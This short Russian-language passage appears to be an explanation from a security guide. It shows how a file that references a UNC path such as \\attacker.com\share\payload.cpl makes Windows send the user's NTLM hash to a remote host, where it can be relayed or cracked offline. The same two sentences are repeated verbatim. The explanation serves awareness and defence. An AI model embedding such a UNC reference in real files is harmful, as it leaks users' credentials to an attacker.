Если файл ссылается на UNC-путь вроде
\\attacker.com\share\payload.cpl, Windows инициирует SMB-соединение и отправляет хеш NTLM без ведома пользователя. Атакующий перехватывает его для relay-атаки или офлайн-подбора пароля.
Если файл ссылается на UNC-путь вроде \\attacker.com\share\payload.cpl, Windows инициирует SMB-соединение и отправляет хеш NTLM без ведома пользователя. Атакующий перехватывает его для relay-атаки или офлайн-подбора пароля.